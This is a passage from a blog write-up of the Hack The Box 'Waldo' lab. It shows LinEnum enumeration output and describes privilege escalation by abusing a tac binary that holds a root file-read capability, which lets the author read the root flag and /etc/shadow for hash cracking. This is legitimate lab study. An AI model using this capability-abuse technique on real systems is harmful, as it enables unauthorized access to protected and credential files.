drwxr-xr-x 5 root root 4096 May  1 23:25 ..
-rw------- 1 root root    9 Sep 13 04:09 cron.daily
-rw------- 1 root root    9 Sep 13 04:19 cron.monthly
-rw------- 1 root root    9 Sep 13 04:14 cron.weekly

### NETWORKING  ##########################################
[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:a4:80:14 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.87/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:a6:3e:f0:61 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever

[-] ARP history:
10.10.10.2 dev ens33 lladdr 00:50:56:a4:99:88 REACHABLE

[-] Nameserver(s):
nameserver 10.10.10.2

[-] Nameserver(s):
Global
         DNS Servers: 10.10.10.2
          DNS Domain: localdomain
          DNSSEC NTA: 10.in-addr.arpa
                      16.172.in-addr.arpa
                      168.192.in-addr.arpa
                      17.172.in-addr.arpa
                      18.172.in-addr.arpa
                      19.172.in-addr.arpa
                      20.172.in-addr.arpa
                      21.172.in-addr.arpa
                      22.172.in-addr.arpa
                      23.172.in-addr.arpa
                      24.172.in-addr.arpa
                      25.172.in-addr.arpa
                      26.172.in-addr.arpa
                      27.172.in-addr.arpa
                      28.172.in-addr.arpa
                      29.172.in-addr.arpa
                      30.172.in-addr.arpa
                      31.172.in-addr.arpa
                      corp
                      d.f.ip6.arpa
                      home
                      internal
                      intranet
                      lan
                      local
                      private
                      test
Link 3 (docker0)
      Current Scopes: none
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no
Link 2 (ens33)
      Current Scopes: LLMNR/IPv4
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no

[-] Default route:
default via 10.10.10.2 dev ens33 onlink 

[-] Listening TCP:
State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port                
ESTAB      0      0      127.0.0.1:35820                127.0.1.1:ssh                  
ESTAB      0      0      127.0.1.1:ssh                  127.0.0.1:35820                
ESTAB      0      10834  10.10.10.87:8888                 10.10.14.19:58820                

### SERVICES #############################################
[-] Running processes:
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.0  0.6  56908  6736 ?        Ss   04:04   0:01 /sbin/init
root          2  0.0  0.0      0     0 ?        S    04:04   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    04:04   0:00 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S<   04:04   0:00 [kworker/0:0H]
root          7  0.0  0.0      0     0 ?        S    04:04   0:00 [rcu_sched]
root          8  0.0  0.0      0     0 ?        S    04:04   0:00 [rcu_bh]
root          9  0.0  0.0      0     0 ?        S    04:04   0:00 [migration/0]
root         10  0.0  0.0      0     0 ?        S<   04:04   0:00 [lru-add-drain]
root         11  0.0  0.0      0     0 ?        S    04:04   0:00 [watchdog/0]
root         12  0.0  0.0      0     0 ?        S    04:04   0:00 [cpuhp/0]
root         13  0.0  0.0      0     0 ?        S    04:04   0:00 [kdevtmpfs]
root         14  0.0  0.0      0     0 ?        S<   04:04   0:00 [netns]
root         15  0.0  0.0      0     0 ?        S    04:04   0:00 [khungtaskd]
root         16  0.0  0.0      0     0 ?        S    04:04   0:00 [oom_reaper]
root         17  0.0  0.0      0     0 ?        S<   04:04   0:00 [writeback]
root         18  0.0  0.0      0     0 ?        S    04:04   0:00 [kcompactd0]
root         19  0.0  0.0      0     0 ?        SN   04:04   0:00 [ksmd]
root         21  0.0  0.0      0     0 ?        SN   04:04   0:00 [khugepaged]
root         22  0.0  0.0      0     0 ?        S<   04:04   0:00 [crypto]
root         23  0.0  0.0      0     0 ?        S<   04:04   0:00 [kintegrityd]
root         24  0.0  0.0      0     0 ?        S<   04:04   0:00 [bioset]
root         25  0.0  0.0      0     0 ?        S<   04:04   0:00 [kblockd]
root         26  0.0  0.0      0     0 ?        S<   04:04   0:00 [devfreq_wq]
root         27  0.0  0.0      0     0 ?        S<   04:04   0:00 [watchdogd]
root         28  0.0  0.0      0     0 ?        S    04:04   0:00 [kswapd0]
root         29  0.0  0.0      0     0 ?        S<   04:04   0:00 [vmstat]
root         41  0.0  0.0      0     0 ?        S<   04:04   0:00 [kthrotld]
root         42  0.0  0.0      0     0 ?        S<   04:04   0:00 [ipv6_addrconf]
root         75  0.0  0.0      0     0 ?        S<   04:04   0:00 [ata_sff]
root         76  0.0  0.0      0     0 ?        S    04:04   0:00 [scsi_eh_0]
root         77  0.0  0.0      0     0 ?        S    04:04   0:00 [scsi_eh_1]
root         78  0.0  0.0      0     0 ?        S<   04:04   0:00 [scsi_tmf_0]
root         79  0.0  0.0      0     0 ?        S<   04:04   0:00 [scsi_tmf_1]
root         80  0.0  0.0      0     0 ?        S<   04:04   0:00 [vmw_pvscsi_wq_0]
root         81  0.0  0.0      0     0 ?        S    04:04   0:00 [scsi_eh_2]
root         82  0.0  0.0      0     0 ?        S    04:04   0:00 [kworker/u256:1]
root         83  0.0  0.0      0     0 ?        S<   04:04   0:00 [scsi_tmf_2]
root         84  0.0  0.0      0     0 ?        S<   04:04   0:00 [bioset]
root        128  0.0  0.0      0     0 ?        S<   04:04   0:00 [bioset]
root        132  0.0  0.0      0     0 ?        S<   04:04   0:00 [kworker/0:1H]
root        164  0.0  0.0      0     0 ?        S    04:04   0:00 [jbd2/sda1-8]
root        165  0.0  0.0      0     0 ?        S<   04:04   0:00 [ext4-rsv-conver]
root        191  0.0  1.0 133772 10444 ?        Ss   04:04   0:13 /usr/bin/vmtoolsd
root        192  0.0  0.0      0     0 ?        S    04:04   0:00 [kauditd]
root        196  0.0  0.4  56800  4836 ?        Ss   04:04   0:00 /lib/systemd/systemd-journald
root        221  0.0  0.3  45256  3440 ?        Ss   04:04   0:00 /lib/systemd/systemd-udevd
root        279  0.0  0.0      0     0 ?        S<   04:04   0:00 [ttm_swap]
root        310  0.0  0.0      0     0 ?        S<   04:04   0:00 [edac-poller]
systemd+    348  0.0  0.4 127284  4200 ?        Ssl  04:04   0:01 /lib/systemd/systemd-timesyncd
root        366  0.0  0.3 250116  3260 ?        Ssl  04:04   0:00 /usr/sbin/rsyslogd -n
root        367  0.0  1.8 153488 18452 ?        Ss   04:04   0:00 /usr/bin/VGAuthService
root        368  0.0  0.2  29664  2848 ?        Ss   04:04   0:00 /usr/sbin/cron -f
message+    370  0.0  0.3  45116  3676 ?        Ss   04:04   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root        384  0.0  0.4  46524  4800 ?        Ss   04:04   0:00 /lib/systemd/systemd-logind
root        509  0.1  6.4 452516 64620 ?        Ssl  04:04   0:20 /usr/bin/dockerd -H fd://
root        512  0.0  0.1  14536  1660 tty1     Ss+  04:04   0:00 /sbin/agetty --noclear tty1 linux
root        513  0.0  0.6  69944  6208 ?        Ss   04:04   0:00 /usr/sbin/sshd -D
root        607  0.1  2.2 235016 22424 ?        Ssl  04:05   0:20 docker-containerd --config /var/run/docker/containerd/containerd.toml
root        734  0.0  0.4   7648  4388 ?        Sl   04:05   0:00 docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/16c6cae0786900838a54b9b3ce253ddd80c3ccdcea93e6c5444e2a8a5a1eaebd -address /var/run/docker/containerd/docker-containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc
root        747  0.0  1.6  85124 16824 pts/0    Ss+  04:05   0:04 /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        777  0.0  0.3  12784  3432 pts/0    S    04:05   0:00 nginx: master process nginx -g daemon off;
root        778  0.0  0.2   7320  2664 pts/0    S    04:05   0:00 /usr/sbin/sshd -D -e
root        779  0.0  1.7 133368 17404 pts/0    S    04:05   0:01 php-fpm: master process (/etc/php7/php-fpm.conf)
systemd+    780  0.0  0.1  13264  1680 pts/0    S    04:05   0:00 nginx: worker process
root        782  0.0  0.2   7352  2716 ?        Ss   04:06   0:00 sshd: nobody [priv]
nobody      784  0.0  0.3   9112  3748 ?        S    04:06   0:02 sshd: nobody@pts/1
nobody      785  0.0  0.1   1544  1028 ?        Ss   04:06   0:00 -sh
root       1288  0.0  0.0      0     0 ?        S    06:08   0:08 [kworker/0:1]
nobody     1364  0.0  0.3   8460  3716 ?        S+   06:27   0:01 ssh monitor@waldo -i .monitor
root       1365  0.0  0.7 101380  7180 ?        Ss   06:27   0:00 sshd: monitor [priv]
monitor    1367  0.0  0.6  64872  6088 ?        Ss   06:27   0:00 /lib/systemd/systemd --user
monitor    1368  0.0  0.1  84492  1564 ?        S    06:27   0:00 (sd-pam)
monitor    1374  0.0  0.4 101380  4700 ?        S    06:27   0:00 sshd: monitor@pts/0
monitor    1375  0.0  0.4  21176  4908 pts/0    Ss   06:27   0:00 -rbash
monitor    1442  0.0  0.0   5856   692 pts/0    S    06:50   0:00 red -p red:
monitor    1487  0.0  0.0   4288   796 pts/0    S    07:27   0:00 sh -c /bin/bash
monitor    1488  0.0  0.5  21216  5096 pts/0    S    07:27   0:00 /bin/bash
systemd+   1741  0.0  0.4  49620  4052 ?        Ss   07:50   0:00 /lib/systemd/systemd-resolved
root       1754  0.0  0.0      0     0 ?        S    07:50   0:00 [kworker/u256:0]
root       2381  0.0  0.0      0     0 ?        S    09:28   0:00 [kworker/0:2]
root       2382  0.0  0.0      0     0 ?        S    09:33   0:00 [kworker/0:0]
monitor    2391  0.0  0.3  12140  3888 pts/0    S+   09:38   0:00 /bin/bash /tmp/LinEnum.sh
monitor    2392  0.0  0.3  12176  3372 pts/0    S+   09:38   0:00 /bin/bash /tmp/LinEnum.sh
monitor    2393  0.0  0.0   5844   688 pts/0    S+   09:38   0:00 tee -a
monitor    2564  0.0  0.2  12176  2924 pts/0    S+   09:38   0:00 /bin/bash /tmp/LinEnum.sh
monitor    2565  0.0  0.3  38304  3168 pts/0    R+   09:38   0:00 ps aux

[-] Process binaries and associated permissions (from above list):
776K -rwxr-xr-x 1 root root 773K Mar  1  2018 /usr/sbin/sshd
640K -rwxr-xr-x 1 root root 637K Jan 18  2017 /usr/sbin/rsyslogd
 48K -rwxr-xr-x 1 root root  48K Oct  7  2017 /usr/sbin/cron
 48K -rwxr-xr-x 1 root root  48K Jul 25  2017 /usr/bin/vmtoolsd
152K -rwxr-xr-x 1 root root 149K Jul 25  2017 /usr/bin/VGAuthService
   0 lrwxrwxrwx 1 root root    9 Jan 24  2017 /usr/bin/python2 -> python2.7
 79M -rwxr-xr-x 1 root root  79M Apr 10 14:20 /usr/bin/dockerd
220K -rwxr-xr-x 1 root root 219K Mar  2  2018 /usr/bin/dbus-daemon
   0 lrwxrwxrwx 1 root root   20 Mar 23 08:55 /sbin/init -> /lib/systemd/systemd
 60K -rwxr-xr-x 1 root root  57K Mar  7  2018 /sbin/agetty
456K -rwxr-xr-x 1 root root 455K Mar 23 08:55 /lib/systemd/systemd-udevd
 40K -rwxr-xr-x 1 root root  39K Mar 23 08:55 /lib/systemd/systemd-timesyncd
316K -rwxr-xr-x 1 root root 315K Mar 23 08:55 /lib/systemd/systemd-resolved
204K -rwxr-xr-x 1 root root 203K Mar 23 08:55 /lib/systemd/systemd-logind
120K -rwxr-xr-x 1 root root 119K Mar 23 08:55 /lib/systemd/systemd-journald
1.1M -rwxr-xr-x 1 root root 1.1M Mar 23 08:55 /lib/systemd/systemd
1.1M -rwxr-xr-x 1 root root 1.1M May 15  2017 /bin/bash

[-] /etc/init.d/ binary permissions:
total 88
drwxr-xr-x  2 root root 4096 Jul 15 09:48 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x  1 root root 2014 May 29  2017 anacron
-rwxr-xr-x  1 root root 2948 Sep 13  2017 bluetooth
-rwxr-xr-x  1 root root 1232 Apr  6  2017 console-setup.sh
-rwxr-xr-x  1 root root 3049 Oct  7  2017 cron
-rwxr-xr-x  1 root root 2813 Mar  2  2018 dbus
-rwxr-xr-x  1 root root 3843 Apr 10 14:09 docker
-rwxr-xr-x  1 root root 3809 Mar 22  2017 hwclock.sh
-rwxr-xr-x  1 root root 1479 May 18  2016 keyboard-setup.sh
-rwxr-xr-x  1 root root 2044 Dec 25  2016 kmod
-rwxr-xr-x  1 root root 1364 Mar 17  2017 netfilter-persistent
-rwxr-xr-x  1 root root 4597 Sep 16  2016 networking
-rwxr-xr-x  1 root root 1846 Jul 25  2017 open-vm-tools
-rwxr-xr-x  1 root root 1191 Nov 22  2016 procps
-rwxr-xr-x  1 root root 4355 Dec 10  2017 rsync
-rwxr-xr-x  1 root root 2868 Jan 18  2017 rsyslog
-rwxr-xr-x  1 root root 4033 Mar  1  2018 ssh
-rwxr-xr-x  1 root root 6087 Dec  3  2017 udev

### SOFTWARE #############################################
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl

[-] Installed compilers:
ii  gcc                           4:6.3.0-4                      amd64        GNU C compiler
ii  gcc-6                         6.3.0-18+deb9u1                amd64        GNU C compiler

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1627 May  3 16:50 /etc/passwd
-rw-r--r-- 1 root root 773 May  3 16:50 /etc/group
-rw-r--r-- 1 root root 869 May  3 16:50 /etc/profile
-rw-r----- 1 root shadow 1218 May  3 16:50 /etc/shadow

[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 2792 Jul 24 05:50 /etc/sysctl.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 7431 May  1 23:26 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 9 Aug  7  2006 /etc/host.conf
-rw-r--r-- 1 root root 346 Nov 30  2016 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 3173 Mar  2  2018 /etc/reportbug.conf
-rw-r--r-- 1 root root 60 Jul 23 10:14 /etc/resolv.conf
-rw-r--r-- 1 root root 1963 Jan 18  2017 /etc/rsyslog.conf
-rw-r--r-- 1 root root 497 Dec 31  2017 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2969 May 21  2017 /etc/debconf.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 4781 Jan 24  2017 /etc/hdparm.conf
-rw-r--r-- 1 root root 191 Apr 12  2017 /etc/libaudit.conf
-rw-r--r-- 1 root root 2981 May  1 23:03 /etc/adduser.conf
-rw-r--r-- 1 root root 2584 Aug  1  2016 /etc/gai.conf
-rw-r--r-- 1 root root 599 May  5  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 144 May  1 23:30 /etc/kernel-img.conf
-rw-r--r-- 1 root root 552 May 27  2017 /etc/pam.conf
-rw-r--r-- 1 root root 973 Jan 31  2017 /etc/mke2fs.conf
-rw-r--r-- 1 root root 604 Jun 26  2016 /etc/deluser.conf
-rw-r--r-- 1 root root 34 Apr  9  2017 /etc/ld.so.conf

[-] Current user's history files:
lrwxrwxrwx 1 root root 9 Jul 24 07:58 /home/monitor/.bash_history -> /dev/null

[-] Location and contents (if accessible) of .bash_history file(s):
/home/monitor/.bash_history

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 May  1 23:03 .
drwxr-xr-x 11 root root 4096 May  1 23:03 ..

[+] Looks like we're hosting Docker:
Docker version 18.04.0-ce, build 3d479c0

### SCAN COMPLETE ####################################
monitor@waldo:/tmp$ 

Privilege Escalation

Privesc on this machine took ages. I got stuck down various rabbit holes for hours, days even. I’m not going lie, I don’t think that without some HTB forum hints I would have got much further in any reasonable amount of time.

The app-dev folder contains code and executables for a log monitoring application and since the passwd file says the monitor user is “for editing source and monitoring logs” I assumed that the box-writer intended us to edit some source code. The logMonitor binary in the app-dev folders doesn’t do what it’s supposed to do. Feeding it options like -a doesn’t read the log that the source code indicates it should, only the -h help options works. However there is a subfolder with a 0.1 version which DOES work.  But the weird thing is, that file does not have root permissions or SUID set, which leaves you wondering how it’s able to access log files that the other app cannot even though they’re both being used by the same user. So the question becomes “what is the difference between this and the non-working version?”:

The answer turns out to be down to Capabilities which are a security feature that allows you to dish out subdivisions of superuser privileges like reading files etc see: https://man7.org/linux/man-pages/man7/capabilities.7.html – if you use the getcap command you can see what Capabilities the updated logMonitor binary has, that the other one doesn’t. Maybe there is a clever way of using this involving editing the source code to give you various powers overwriting the logMonitor-0.1 and abusing, there is a python file that appears to check a file do something with the hash which also hints at maybe replacing this file, but I couldn’t work it out if there is. But using getcap -r / 2>dev/null shows the Capabilities settings for all files we can access and it shows up a command called tac (which is cat in reverse) which can output the contents of files and since it’s been given the root-level file-read capability, it can read the /root/root.txt and we’ve got our flag.

We can also read the shadow file and I ran JTR over the hashes found there but didn’t get a hit with the wordlists I used.

Filed Under: Penetration Testing

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

About Me

I’m currently a systems admin / consultant at a IT firm who looks after the computer systems of small businesses in the UK. IT security is only a part of that job. However I’ve always enjoyed breaking into, getting around, subverting and otherwise hacking things, systems and ideas. In tackling some low-level IT security tasks I reignited my interest in the field and this blog charts my progress in the world of Computer Security, legal Hacking, Penetration Testing, Infosec – whatever you want to call it. As a Windows guy I’m learning about Linux, shell-scripting, python and all the other skills needed in this field.

Tags

Apache Boot-to-Root CTF curl dib Dirbuster FreeBSD Hack The Box Linux mysql NFS Penetration Testing PHP RCE shell VulnHub Wordpress

Categories

© 2023 · NeilSec;